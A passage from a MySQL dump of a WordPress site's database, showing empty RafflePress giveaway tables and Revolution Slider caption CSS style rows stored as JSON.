  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  `referrer_id` int(10) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_rafflepress_entries`
--

LOCK TABLES `dnctiavkr_rafflepress_entries` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_rafflepress_giveaways`
--

DROP TABLE IF EXISTS `dnctiavkr_rafflepress_giveaways`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_rafflepress_giveaways` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) DEFAULT NULL,
  `slug` varchar(250) DEFAULT NULL,
  `parent_url` varchar(250) DEFAULT NULL,
  `uuid` varchar(250) DEFAULT NULL,
  `settings` longtext DEFAULT NULL,
  `meta` longtext DEFAULT NULL,
  `starts` datetime DEFAULT NULL,
  `ends` datetime DEFAULT NULL,
  `active` tinyint(4) NOT NULL DEFAULT 1,
  `show_leaderboard` tinyint(4) NOT NULL DEFAULT 0,
  `giveawaytemplate_id` varchar(250) DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_rafflepress_giveaways`
--

LOCK TABLES `dnctiavkr_rafflepress_giveaways` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_giveaways` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_giveaways` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_css`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_css`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_css` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext DEFAULT NULL,
  `hover` longtext DEFAULT NULL,
  `advanced` longtext DEFAULT NULL,
  `params` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `handle_index` (`handle`(64))
) ENGINE=InnoDB AUTO_INCREMENT=110 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_css`
--

LOCK TABLES `dnctiavkr_revslider_css` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_css` DISABLE KEYS */;
INSERT INTO `dnctiavkr_revslider_css` VALUES
(1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}'),
(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}'),
(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}'),
(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}'),
(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}'),
(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),
(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}','[]'),
(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000\"}'),
(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','[]'),
(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),
(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),
(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'),
(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
